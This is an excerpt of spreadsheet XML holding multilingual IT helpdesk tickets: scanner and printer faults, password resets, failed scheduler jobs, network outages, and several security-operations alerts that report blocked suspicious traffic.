    <s v="_x000a__x000a_received from: jctnelqs.lansuiwe@gmail.com_x000a__x000a_verehrte damen und herren,_x000a__x000a_aktuell funktioniert das einskannen von unterlagen nicht. (â€¦.kein zugriff)_x000a__x000a_drucker                mp72_x000a_pc â€“ nr.               empw8111312_x000a__x000a__x000a_bitte um abhilfe._x000a__x000a_mit freundlichem gruÃŸ_x000a__x000a_jctnelqs lansuiwe_x000a_quality assurance_x000a_jctnelqs.lansuiwe@gmail.com&lt;mailto:jctnelqs.lansuiwe@gmail.com&gt;_x000a__x000a_persÃ¶nlich haftende gesellschafterin: company gmbh_x000a_sitz der gesellschaft: fÃ¼rth - registergerirtcht: fÃ¼rth hrb 10257_x000a__x000a_"/>
    <s v="jctnelqs lansuiwe"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ms office 2016 installation wird nicht abgeschlossen, siehe anhang! tel.: 107"/>
    <s v="office installation wird nicht abgeschlossen!"/>
    <s v="yvjdluhk hmcpvtdj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="tr: rappel: vous avez un nouveau message ! **** spam ****"/>
    <s v="_x000d__x000a__x000d__x000a_received from: hupnceij.hyozjakb@gmail.com_x000d__x000a__x000d__x000a_hello all,_x000d__x000a_it's a spam, i do not have any account in ingdirect, and if i would have one, wouldn't related to my company email_x000d__x000a__x000d__x000a_sincÃ¨res salutations, best "/>
    <s v="hupnceij hyozjakb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="scannen funktioniert nicht"/>
    <s v="scannen auf publik beim drucker mp60 funktioniert nicht."/>
    <s v="nzpgwjsa perajnvh"/>
    <x v="32"/>
  </r>
  <r>
    <s v="zlgmctws khfjzyto donÂ´t have access to her computer / she has forgotten her password, could you please help us?"/>
    <s v="_x000d__x000a__x000d__x000a_received from: qbewrpfu.lwibmxzo@gmail.com_x000d__x000a__x000d__x000a_mit freundlichen grÃ¼ÃŸen / best "/>
    <s v="qbewrpfu lwibmxzo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account locked out and password reset "/>
    <s v="account locked out and password reset "/>
    <s v="cobsfvjz apkqmrdu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp password locked"/>
    <s v="_x000d__x000a__x000d__x000a_received from: gnasmtvx.cwxtsvkm@gmail.com_x000d__x000a__x000d__x000a_hi._x000d__x000a__x000d__x000a_please unblock the erp password._x000d__x000a__x000d__x000a_userid: hegdthy (gnasmtvx cwxtsvkm)_x000d__x000a__x000d__x000a_"/>
    <s v="gnasmtvx cwxtsvkm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="scanner im werk germany steel funktionieren nicht!"/>
    <s v="for your information: ngprt29, the printer name"/>
    <s v="azmbnwgp qbrucnpm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_1338 failed in job_scheduler at: 08/29/2016 02:14:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1338 failed in job_scheduler at: 08/29/2016 02:14:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="laptop key bankrd not working"/>
    <s v="please do the needful._x000a__x000a_for company_x000a_athjyul dixhtyuit , _x000a_m +91 _x000a__x000a_from: athjyul dixhtyuit _x000a_sent: saturday, july 30, 2016 1:14 pm_x000a_to: 'help@company.com' &lt;help@company.com&gt;_x000a_subject: laptop key bankrd not working_x000a__x000a_my laptop key bankrd not working . please depute dell person to attend the problem. _x000a__x000a_laptop model is latitude 7350._x000a_asset code is 801302_x000a_service tag-dcgw262_x000a__x000a_for company_x000a__x000a_athjyul dixhtyuit       _x000a_senior manager sales - north ( msg)_x000a_qubywmgf.jouickqx@gmail.com_x000a__x000a__x000a_companytm_x000a__x000a_"/>
    <s v="qubywmgf jouickqx"/>
    <x v="18"/>
  </r>
  <r>
    <s v="not able to print on id02"/>
    <s v="not able to print on id02"/>
    <s v="qycgdfhz iqshzdru"/>
    <x v="18"/>
  </r>
  <r>
    <s v="scannen vom scanner vh48 geht nicht mit dem hinweise: laufwerk nicht bekannt!"/>
    <s v="scannen vom scanner vh48 geht nicht mit dem hinweise: laufwerk nicht bekannt!"/>
    <s v="yvjdluhk hmcpvtdj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="our printer rn33 at plant_223 doesn't work"/>
    <s v="hello,_x000d__x000a_our printer rn33 at plant_223 for production papers doesn't work._x000d__x000a_ we need it support a.s.a.p._x000d__x000a_"/>
    <s v="yfmaqovp wdonhbez"/>
    <x v="32"/>
  </r>
  <r>
    <s v="beim scannen von auftrÃ¤gen kommt die meldung das der pfad nicht existiert"/>
    <s v="beim scannen von auftrÃ¤gen kommt die meldung das der pfad nicht existiert"/>
    <s v="kiqrvwat gwkpxzyt"/>
    <x v="32"/>
  </r>
  <r>
    <s v="nx is not opening through extr but nx power drafting is opening"/>
    <s v="name:megfgthyhana_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:pkzthgea.kgvsdmpj@gmail.com_x000a_customer number:_x000a_telephone:073_x000a_summary:nx is not opening through extr but nx power drafting is opening"/>
    <s v="pkzthgea kgvsdmpj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp login error"/>
    <s v="_x000d__x000a__x000d__x000a_received from: rmezbnqt.ntbmkpuh@gmail.com_x000d__x000a__x000d__x000a_hi,_x000d__x000a__x000d__x000a_                i am unable to login to erp please do the needful._x000d__x000a__x000d__x000a__x000d__x000a_[cid:image001.jpg@01d201e2.2bb514d0]_x000d__x000a__x000d__x000a_"/>
    <s v="rmezbnqt ntbmkpuh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account information updated"/>
    <s v="hi, _x000d__x000a__x000d__x000a_could you please confirm whether this is a genuine mail??_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="cqargubj krdxbfqh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="wi fi connectivity issues"/>
    <s v="_x000a__x000a_received from: dshferby.houtnzdi@gmail.com_x000a__x000a_dear team,_x000a__x000a_good morning._x000a__x000a_we observe lot of wi fi connectivity issues in kirgtyan training room ( pu6 ground floor), taranga ( pu6, i floor), pu5 i floor office area, emerald conference room (admin i floor)._x000a_kind request you to look into that._x000a__x000a_"/>
    <s v="dshferby houtnzdi"/>
    <x v="3"/>
  </r>
  <r>
    <s v="telecom_vendor_2 card is not working "/>
    <s v="telecom_vendor_2 card is not working "/>
    <s v="lorszemd waotbgrv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="power is not working"/>
    <s v="computer wont turn on _x000d__x000a_power is not working"/>
    <s v="asthifne baehplqt"/>
    <x v="18"/>
  </r>
  <r>
    <s v="account locked out and password reset "/>
    <s v="account locked out and password reset "/>
    <s v="tgynoqcs uxfyzrma"/>
    <x v="0"/>
  </r>
  <r>
    <s v="request to reset microsoft online services password"/>
    <s v="from: microsoft on behalf of company inc. [mailto:msonlineservicesteam@microsoftonline.com] _x000a_sent: monday, august 29, 2016 9:07 am_x000a_to: nwfodmhc exurcwkm_x000a_cc: tiyhum kuyiomar_x000a_subject: rad:request to reset microsoft online services password for tgynoqcs.uxfyzrma@gmail.com_x000a_importance: high_x000a__x000a_    request to reset user's password   _x000a_   the following user in your organization has requested a password reset be performed for their account: _x000a__x000a_â€¢ tgynoqcs.uxfyzrma@gmail.com _x000a_â€¢ first name: nehtjuavathi _x000a_â€¢ last name: patirjy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tgynoqcs uxfyzrma"/>
    <x v="0"/>
  </r>
  <r>
    <s v="mobile device activation"/>
    <s v="from: hzudxyqb qsmrwvle _x000d__x000a_sent: monday, august 29, 2016 8:38 am_x000d__x000a_to: nwfodmhc exurcwkm_x000d__x000a_subject: rad:fw: your mobile device is temporarily blocked from synchronizing using exchange activesync until your administrator usas it access._x000d__x000a_importance: high_x000d__x000a__x000d__x000a_please restore my mobile settings to enable access emails on mobile._x000d__x000a__x000d__x000a_thanking you,_x000d__x000a__x000d__x000a_best "/>
    <s v="hzudxyqb qsmrwvle"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook not working"/>
    <s v="name:vivian kurtyar _x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:jecigpzw.gqpmxwal@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:outlook not working"/>
    <s v="jecigpzw gqpmxwal"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp not working "/>
    <s v="_x000d__x000a__x000d__x000a_received from: irqpwgtn.dpautgeh@gmail.com_x000d__x000a__x000d__x000a_dear sir,_x000d__x000a_following message is coming while clicking erp icon:_x000d__x000a__x000d__x000a_emp code: 2027646758_x000d__x000a_user id: schyhty_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_[cid:image001.jpg@01d20129.ebbd62f0]_x000d__x000a__x000d__x000a_with best "/>
    <s v="irqpwgtn dpautgeh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="error while changing password in password_management_tool password manager (error msg is attached)"/>
    <s v="error while changing password in password_management_tool password manager. please see attached snapshot &amp; do the needful."/>
    <s v="ythucdjx mujfrsyl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="please help to unlock pw for user: zhrgtangs7"/>
    <s v="_x000d__x000a__x000d__x000a_received from: kbclinop.vsczklfp@gmail.com_x000d__x000a__x000d__x000a_hi,_x000d__x000a_we tried to unlock from password_management_tool site but failed.   please help to unlock for user : zhrgtangs7._x000d__x000a_"/>
    <s v="kbclinop vsczklfp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job hr_payroll_na_u1 failed in job_scheduler at: 08/28/2016 23:00:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job hr_payroll_na_u1 failed in job_scheduler at: 08/28/2016 23:00:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="9"/>
  </r>
  <r>
    <s v="job hr_payroll_na_u6 failed in job_scheduler at: 08/28/2016 23:00:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job hr_payroll_na_u6 failed in job_scheduler at: 08/28/2016 23:00:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="9"/>
  </r>
  <r>
    <s v="job hr_payroll_na_u2 failed in job_scheduler at: 08/28/2016 23:00:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job hr_payroll_na_u2 failed in job_scheduler at: 08/28/2016 23:00:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="9"/>
  </r>
  <r>
    <s v="windows account locked "/>
    <s v="windows account locked "/>
    <s v="tqaevrng hpocnrvj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="not able to login attendance_tool"/>
    <s v="i am not able to login attendance_tool application. my user id is 210516 "/>
    <s v="cgvhxjay znyuopqk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="apac china pbx/telephony_software system issue"/>
    <s v="apac china&amp; dc have ip phone issue, one e1 lineï¼ˆphone number range 2062xxxxï¼‰ can't dial out exterior lineï¼Œif you dial out exterior line, we always received busy tone, but we can dial in. i called pbx vendor(siemens) engineer &amp; isp to check their devices, the feedback is all devices working fine. so they let us to check our audiocodes devices, cause all line connect to audiocodes. please contact related person to contact me &amp; help me solve the problem. "/>
    <s v="bqdyhnoj rwyvsfgn"/>
    <x v="36"/>
  </r>
  <r>
    <s v="ç”µè„‘å¯†ç åŒæ­¥é—®é¢˜"/>
    <s v="hi gartryhu,_x000d__x000a__x000d__x000a_æˆ‘çŽ°åœ¨ç”µè„‘æœ‰å‡ ä¸ªé—®é¢˜ï¼Œèƒ½å¦è¿œç¨‹è¿žæŽ¥åŽå¸®æˆ‘å¤„ç†ä¸€ä¸‹ã€‚_x000d__x000a__x000d__x000a_æœ€è¿‘æ›´æ”¹å¯†ç å¹¶è¯•å›¾åŒæ­¥åŽï¼ŒåŒæ­¥æ²¡å®Œæˆï¼Œå¼€æœºå¯†ç ä¸Žé‚®ä»¶å¯†ç ä¸ç»Ÿä¸€ï¼Œä¸”ä¸èƒ½ä½¿ç”¨è‚¯çº³è´­ç‰©ç½‘ï¼Œæœ€ä¸¥é‡çš„æ˜¯ï¼ŒvpnçŽ°åœ¨è¿žä¸ä¸Šäº†ï¼Œæç¤ºæ˜¯å¯†ç é”™è¯¯ï¼Œå¯æˆ‘æ— è®ºè¾“å…¥åŽŸæ¥çš„å¯†ç æˆ–æ›´æ”¹åŽçš„å¯†ç ï¼Œéƒ½ä¸èƒ½è¿žæŽ¥ï¼Œèƒ½å¸®å¿™è§£å†³ä¸€ä¸‹å—ï¼Ÿ_x000d__x000a__x000d__x000a__x000d__x000a_best "/>
    <s v="pqaoenuv dqythubf"/>
    <x v="31"/>
  </r>
  <r>
    <s v="shipping notice"/>
    <s v="from: north service _x000a_sent: monday, august 29, 2016 7:42 am_x000a_to: nwfodmhc exurcwkm_x000a_cc: hrlwizav elyamqro_x000a_subject: rad:shipping notice_x000a__x000a_hello,guys_x000a__x000a_pls kindly set shipping notice under plant_283 for below customer to hrlwizav.elyamqro@gmail.com_x000a__x000a_81507257_x000a_70443464_x000a_81857752_x000a__x000a__x000a_"/>
    <s v="qgrbdnoc dgupnhxv"/>
    <x v="17"/>
  </r>
  <r>
    <s v="skype could not work"/>
    <s v="skype could not work ï¼Œcan not hear anything"/>
    <s v="qpysibeo zpekrnbu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="laptop slowness issue"/>
    <s v="laptop slowness while using multiple apps at a time. "/>
    <s v="spxqmiry zpwgoqju"/>
    <x v="18"/>
  </r>
  <r>
    <s v="wgq dcæ‰€æœ‰ç”µè¯æ— æ³•æ‹¨é€šå¤–çº¿"/>
    <s v="wgq dcæ‰€æœ‰ç”µè¯æ— æ³•æ‹¨é€šå¤–çº¿ã€‚"/>
    <s v="wktesmbp lorjymef"/>
    <x v="31"/>
  </r>
  <r>
    <s v="wireless outage again-taiwan 0829"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ticqvhal.vgokzesi@gmail.com_x000d__x000a__x000d__x000a_hello~_x000d__x000a__x000d__x000a_wireless(companysecure) outage of taiwan._x000d__x000a_please help~_x000d__x000a__x000d__x000a_"/>
    <s v="ticqvhal vgokzesi"/>
    <x v="3"/>
  </r>
  <r>
    <s v=" request to reset microsoft online services password for nhjpxoct.ewngozhx@gmail.com"/>
    <s v=" request to reset microsoft online services password for nhjpxoct.ewngozhx@gmail.com"/>
    <s v="nhjpxoct ewngozhx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job bk_hana_SID_61_erp_wly_dp failed in job_scheduler at: 08/28/2016 20:08:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bk_hana_SID_61_erp_wly_dp failed in job_scheduler at: 08/28/2016 20:08:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="ç”µè„‘ä¸èƒ½å¼€æœº"/>
    <s v="æ—©ä¸Šä¸Šç­ç”µè„‘æ‰“ä¸å¼€ã€‚"/>
    <s v="mzerdtop xnlytczj"/>
    <x v="30"/>
  </r>
  <r>
    <s v="engineering tool access requested"/>
    <s v="engineering tool access requested"/>
    <s v="ajdcnwtb bvijwxko"/>
    <x v="0"/>
  </r>
  <r>
    <s v="broken client anti virus "/>
    <s v="broken client anti virus "/>
    <s v="cvqnstgu ofnimlwx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_1306 failed in job_scheduler at: 08/28/2016 17:21:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1306 failed in job_scheduler at: 08/28/2016 17:21:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="job Job_551 failed in job_scheduler at: 08/28/2016 15:23:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_551 failed in job_scheduler at: 08/28/2016 15:23:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_3194 failed in job_scheduler at: 08/28/2016 14:10:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3194 failed in job_scheduler at: 08/28/2016 14:10:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="9"/>
  </r>
  <r>
    <s v="job snp_heu_5_regen failed in job_scheduler at: 08/28/2016 13:32:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job snp_heu_5_regen failed in job_scheduler at: 08/28/2016 13:32:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="job bk_hana_SID_62_erp_wly_dp failed in job_scheduler at: 08/28/2016 13:25:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bk_hana_SID_62_erp_wly_dp failed in job_scheduler at: 08/28/2016 13:25:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="HostName_1304 :volume consumed on /dev/mksysbalv is more than 85%"/>
    <s v="HostName_1304 :volume consumed on /dev/mksysbalv is more than 85%._x000d__x000a_"/>
    <s v="oldrctiu bxurpsyi"/>
    <x v="46"/>
  </r>
  <r>
    <s v="unable to approve expense report 2111137500 "/>
    <s v="from: proygkjt mwetuhqf _x000a_sent: sunday, august 28, 2016 7:11 pm_x000a_to: nwfodmhc exurcwkm_x000a_cc: ifblxjmc dyrgfwbm; callie pollaurid_x000a_subject: re: expense report 2111137500 has been submitted._x000a__x000a_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_x000a__x000a_-----original message-----_x000a_from: workflow system [mailto:wf-batch@company.com] _x000a_sent: friday, august 26, 2016 6:14 pm_x000a_to: proygkjt mwetuhqf &lt;proygkjt.mwetuhqf@gmail.com&gt;_x000a_subject: expense report 2111137500 has been submitted._x000a__x000a_the following expense report has been submitted for your approval:_x000a__x000a_personnel no.:    12156719280  (jeffrghryeyrghryey a strgrtyiet)_x000a_expense report no.:    2111137500_x000a_start date:    25.07.2016 08:00:00_x000a_end date:    24.08.2016 17:00:00_x000a_total costs:    usd 1.141,89_x000a_reimbursement amount:    usd 1.141,89_x000a__x000a_to review this expense report in full, please log into your universal worklist on manager self-service._x000a__x000a_"/>
    <s v="proygkjt mwetuhqf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_504 failed in job_scheduler at: 08/28/2016 09:43:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_504 failed in job_scheduler at: 08/28/2016 09:43:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_494 failed in job_scheduler at: 08/28/2016 09:22:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_494 failed in job_scheduler at: 08/28/2016 09:22:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_1314 failed in job_scheduler at: 08/28/2016 08:35:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1314 failed in job_scheduler at: 08/28/2016 08:35:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="power outage:usa- (company) - divestiture site is hard down since at 7:40 am et on 08/28/16."/>
    <s v="what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   _____7:40 am et on 08/28/16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134 occurrences of your firewall company-european-asa.company.com-1/80.71.06.702 dropping traffic sourcing from HostName_25"/>
    <s v="dsw_x000d__x000a__x000d__x000a_in33727185incident overview_x000d__x000a_=========================_x000d__x000a_we have detected at least 134 occurrences of your firewall company-european-asa.company.com-1/80.71.06.702 dropping traffic sourcing from HostName_25/15.69.85.2812 and destined to port 44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
    <s v="afkstcev utbnkyop"/>
    <x v="11"/>
  </r>
  <r>
    <s v="job snp_heu_1_regen failed in job_scheduler at: 08/28/2016 05:56:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job snp_heu_1_regen failed in job_scheduler at: 08/28/2016 05:56:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="in HostName_968, HostName_107,  HostName_520 service alwaysupservice.exe is not running."/>
    <s v="in HostName_968, HostName_107,  HostName_520 service alwaysupservice.exe is not running."/>
    <s v="uvrbhlnt bjrmalzi"/>
    <x v="13"/>
  </r>
  <r>
    <s v="job Job_1338 failed in job_scheduler at: 08/28/2016 04:02:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1338 failed in job_scheduler at: 08/28/2016 04:02:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="please reset telephony_software password for: (username)-(ticket_no1545706)"/>
    <s v="please reset telephony_software password_x000a_name:(full name) cajdwtgq breqgycv _x000a_username: pogredrty_x000a_extension: 207563_x000a_site: israel"/>
    <s v="wqfzjycu omleknjd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job mm_zscr0099_wkly_rollfgyuej1 failed in job_scheduler at: 08/28/2016 00:11:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job mm_zscr0099_wkly_rollfgyuej1 failed in job_scheduler at: 08/28/2016 00:11:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_3050 failed in job_scheduler at: 08/27/2016 23:02:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3050 failed in job_scheduler at: 08/27/2016 23:02:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="44"/>
  </r>
  <r>
    <s v="skype for business is shutting down when starting the computer"/>
    <s v="the error message is &quot;skype for business has stopped working&quot; and there is an icon to click that says &quot;close the programdnty&quot;"/>
    <s v="kpnzvsuw lwmqyjbv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="india:switch company-ap-ind-pu4-2960s-stack-sw01(17.01.85.8278) is down since 8:22 pm on 08/27 et"/>
    <s v="india:switch company-ap-ind-pu4-2960s-stack-sw01(17.01.85.8278) is down since 8:22 pm on 08/27 et"/>
    <s v="jloygrwh acvztedi"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_749 failed in job_scheduler at: 08/27/2016 15:29:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_749 failed in job_scheduler at: 08/27/2016 15:29:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_749 failed in job_scheduler at: 08/27/2016 15:29:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_749 failed in job_scheduler at: 08/27/2016 15:29:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job SID_39hotf failed in job_scheduler at: 08/27/2016 15:21:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_39hotf failed in job_scheduler at: 08/27/2016 15:21:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="job SID_48hotf failed in job_scheduler at: 08/27/2016 15:20:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_48hotf failed in job_scheduler at: 08/27/2016 15:20:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="job Job_729 failed in job_scheduler at: 08/27/2016 15:20:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_729 failed in job_scheduler at: 08/27/2016 15:20:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="job SID_55apps failed in job_scheduler at: 08/27/2016 15:10:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_55apps failed in job_scheduler at: 08/27/2016 15:10:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="problem report from pwr8hmc1.hq.company.com;pmr number: 73968,082,000"/>
    <s v="reporting system: 2-hq-dev2-9119-mme-sn21a9bf7 machine type-model/serial: 9119-mme/21a9bf7 problem number: 90_x000a_error: a8115872_x000a_description: platform firmware (0x82) reported an error._x000a_last occurred: 8/27/16 7:47 am_x000a_current status: opened_x000a_pmr number: 739_x000a_details: remote support call generated on pwr8hmc1 completed successfully by server pwr8hmc1(192.168.128.1)._x000a__x000a_"/>
    <s v="oldrctiu bxurpsyi"/>
    <x v="46"/>
  </r>
  <r>
    <s v="company-na-usa-usa-eh-media-2960-access-sw07 switch is down at usa company location since 12:37pm et on 08/27/16"/>
    <s v="company-na-usa-usa-eh-media-2960-access-sw07 switch is down at usa company location since 12:37pm et on 08/27/16"/>
    <s v="dkmcfreg anwmfvlg"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_1925 failed in job_scheduler at: 08/27/2016 12:56:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1925 failed in job_scheduler at: 08/27/2016 12:56:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="cannot connect to internet although wifi connected"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ugephfta.hrbqkvij@gmail.com_x000d__x000a__x000d__x000a_hello_x000d__x000a_cannot connect to any internet site via explorer although my wifi is connected. pls help urgently i am supposed to run uacyltoe hxgayczeing and am already an hour behind._x000d__x000a_"/>
    <s v="ugephfta hrbqkvij"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_1989 failed in job_scheduler at: 08/27/2016 11:24:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1989 failed in job_scheduler at: 08/27/2016 11:24:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="job Job_2071 failed in job_scheduler at: 08/27/2016 11:25:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_2071 failed in job_scheduler at: 08/27/2016 11:25:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="job Job_1989 failed in job_scheduler at: 08/27/2016 11:24:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1989 failed in job_scheduler at: 08/27/2016 11:24:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="job Job_1910 failed in job_scheduler at: 08/27/2016 11:22:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1910 failed in job_scheduler at: 08/27/2016 11:22:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="job Job_1906 failed in job_scheduler at: 08/27/2016 11:21:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1906 failed in job_scheduler at: 08/27/2016 11:21:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="job Job_1904 failed in job_scheduler at: 08/27/2016 11:15:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1904 failed in job_scheduler at: 08/27/2016 11:15:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="HostName_53:volume: f:\ label:dat2-HostName_53 d4e35b72 on server is over 85% space consumed. space available: 1.4 g"/>
    <s v="HostName_53:volume: f:\ label:dat2-HostName_53 d4e35b72 on server is over 85% space consumed. space available: 1.4 gb"/>
    <s v="oldrctiu bxurpsyi"/>
    <x v="11"/>
  </r>
  <r>
    <s v="'repeat outbound connection for 135/tcp' "/>
    <s v="dsw in33693734_x000d__x000a__x000d__x000a_we are seeing your 80.71.06.702/company-european-asa.company.com-1 device generating a high volume of 'repeat outbound connection for 135/tcp' alerts for traffic (blocked) from awyl8911907/10.16.143.215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 soc"/>
    <s v="afkstcev utbnkyop"/>
    <x v="49"/>
  </r>
  <r>
    <s v="repeat outbound connection for 135/tcp"/>
    <s v="dsw in33604236_x000d__x000a__x000d__x000a_incident overview_x000d__x000a_=========================_x000d__x000a_we are seeing your 18.79.63.203/company-internal-asa.company.com-1 device generating a high volume of 'repeat outbound connection for 135/tcp' alerts for traffic (blocked) from lhql8516748/10.24.12.180 to port 135/tcp (remote procedure call (rpc)) of external host 92.242.140.21.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 soc"/>
    <s v="afkstcev utbnkyop"/>
    <x v="2"/>
  </r>
  <r>
    <s v="29866 vid22518 bare http get executable from ip address "/>
    <s v="dsw in33608874_x000d__x000a__x000d__x000a_ received alert(s) for summary &quot;29866 vid22518 bare http get executable from ip address (possible downloader trojan)&quot; from the device with ip address &quot;80.68.49.4169&quot;. the source of this traffic is from ip &quot;16.56.04.95108&quot; (axcl8812244), and the destination is ip &quot;103.7.29.25&quot;. details of an example event are shown below. please investigate this activity and remediate as necessary._x000d__x000a__x000d__x000a_as always, if you have any questions or concerns, please call the counter threat operations center at 877 opt 1 to discuss, or submit a response in the open ticket with an action of &quot;respond to soc&quot;. _x000d__x000a__x000d__x000a_"/>
    <s v="afkstcev utbnkyop"/>
    <x v="30"/>
  </r>
  <r>
    <s v="54.96.80.216/att-apac-asa.company.com-1 device generating at least 129 'internal outbreak for 7/tcp' "/>
